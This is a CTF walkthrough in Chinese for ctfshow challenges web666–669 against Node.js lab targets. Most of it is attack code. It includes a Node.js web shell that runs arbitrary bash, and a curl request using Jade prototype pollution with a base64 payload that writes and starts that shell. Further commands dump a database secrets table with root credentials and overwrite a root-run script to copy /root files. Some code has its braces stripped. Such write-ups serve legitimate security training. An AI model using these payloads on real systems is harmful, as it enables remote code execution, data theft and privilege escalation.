ctfshow终极考核 web66⑥-web669

Posted 2022-01-30 yu22x

配合脚本学习效果更好

web666

可以先看下668
先通过js rce ，然后又拿的flag，flag在数据库中

web667

扫描端口可以找到
3000端口
flag_667=ctfshow503a075560764e3d116436ab73d7a560

web668

通过jade原型链污染写入一个nodejs，并且运行
jade原型链污染可以看下这篇文章
https://blog.csdn.net/miuzzx/article/details/111780832
写入的nodejs内容如下

var http = require('http');
var querystring = require('querystring');

var posthtml = '123';

http.createServer(function (req, res) 
  var body = "";
  req.on('data', function (chunk) 
    body += chunk;
  );
  req.on('end', function () 
    body = querystring.parse(body);
    res.writeHead(200, 'Content-Type': 'text/html; charset=utf8');
 try
    if(body.cmd) 
        res.write("username：" + body.cmd);
        var result= global.process.mainModule.constructor._load('child_process').execSync('bash -c "'+body.cmd+'"').toString();
        res.write(result);
     else 
        res.write(postHTML);
    
    catch
       res.write(postHTML);
    
    res.end();
  );
).listen(8033);

但是直接写生成文件的命令不知道为啥有问题，所以转了下base64

curl -i -X POST -H 'Content-type':'application/json' -d "\\\\"__proto__\\\\":\\\\"__proto__\\\\": \\\\"type\\\\":\\\\"Block\\\\",\\\\"nodes\\\\":\\\\"\\\\",\\\\"compileDebug\\\\":1,\\\\"self\\\\":1,\\\\"line\\\\":\\\\"global.process.mainModule.require('child_process').exec('echo YmFzaCAtYyAiZWNobyBkbUZ5SUdoMGRIQWdQU0J5WlhGMWFYSmxLQ2RvZEhSd0p5azdDblpoY2lCeGRXVnllWE4wY21sdVp5QTlJSEpsY1hWcGNtVW9KM0YxWlhKNWMzUnlhVzVuSnlrN0NncDJZWElnY0c5emRFaFVUVXdnUFNBbk1USXpKenNLSUFwb2RIUndMbU55WldGMFpWTmxjblpsY2lobWRXNWpkR2x2YmlBb2NtVnhMQ0J5WlhNcElIc0tJQ0IyWVhJZ1ltOWtlU0E5SUNJaU93b2dJSEpsY1M1dmJpZ25aR0YwWVNjc0lHWjFibU4wYVc5dUlDaGphSFZ1YXlrZ2V3b2dJQ0FnWW05a2VTQXJQU0JqYUhWdWF6c0tJQ0I5S1RzS0lDQnlaWEV1YjI0b0oyVnVaQ2NzSUdaMWJtTjBhVzl1SUNncElIc0tJQ0FnSUdKdlpIa2dQU0J4ZFdWeWVYTjBjbWx1Wnk1d1lYSnpaU2hpYjJSNUtUc0tJQ0FnSUhKbGN5NTNjbWwwWlVobFlXUW9NakF3TENCN0owTnZiblJsYm5RdFZIbHdaU2M2SUNkMFpYaDBMMmgwYld3N0lHTm9ZWEp6WlhROWRYUm1PQ2Q5S1RzS0lIUnllWHNLSUNBZ0lHbG1LR0p2WkhrdVkyMWtLU0I3Q2lBZ0lDQWdJQ0FnY21WekxuZHlhWFJsS0NKMWMyVnlibUZ0WmUrOG1pSWdLeUJpYjJSNUxtTnRaQ2s3Q2lBZ0lDQWdJQ0FnZG1GeUlISmxjM1ZzZEQwZ1oyeHZZbUZzTG5CeWIyTmxjM011YldGcGJrMXZaSFZzWlM1amIyNXpkSEoxWTNSdmNpNWZiRzloWkNnblkyaHBiR1JmY0hKdlkyVnpjeWNwTG1WNFpXTlRlVzVqS0NkaVlYTm9JQzFqSUNJbksySnZaSGt1WTIxa0t5Y2lKeWt1ZEc5VGRISnBibWNvS1RzS0lDQWdJQ0FnSUNCeVpYTXVkM0pwZEdVb2NtVnpkV3gwS1RzS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdjbVZ6TG5keWFYUmxLSEJ2YzNSSVZFMU1LVHNLSUNBZ0lIMTlDaUFnSUNCallYUmphSHNLSUNBZ0lDQWdJSEpsY3k1M2NtbDBaU2h3YjNOMFNGUk5UQ2s3SUFvZ0lDQWdmUW9nSUNBZ2NtVnpMbVZ1WkNncE93b2dJSDBwT3dwOUtTNXNhWE4wWlc0b09EQXpNeWs3Q2c9PXxiYXNlNjQgLWQgPiAvaG9tZS9ub2RlL2FhLmpzO25vZGUgL2hvbWUvbm9kZS9hYS5qcyI=|base64 -d|bash')\\\\"" http://'''+ip2+''':3000/login`;

生成之后可以直接利用rce

1=echo `curl -X POST -d "cmd=mysql -uroot -proot -e 'use ctfshow;select * from ctfshow_secret'" http://172.2.44.5:8033`;

1=echo `curl -X POST -d "cmd=mysql -uroot -proot -e 'use ctfshow;select * from ctfshow_secret'" http://172.2.44.5:8033`;

flag_668=ctfshow5b617bd75e1242ab1f6f70437bb71dd5

web669

通过ps -a命令看到root正在运行一个sh文件,而且我们是可以打开的

内容如下

每隔一分钟会运行node下的一个sh文件，那么我们只需要修改下这个node文件的内容就可以了。
先删除掉，在重新写个内容。

1=echo curl -X POST -d "cmd=rm -rf nodestartup.sh;echo 'cat /root/* > /home/node/a.txt ' > nodestartup.sh" http://172.2.132.5:8033;

flag_669ctfshowa6c74ca12174eb538a4c8c8ed99c3a74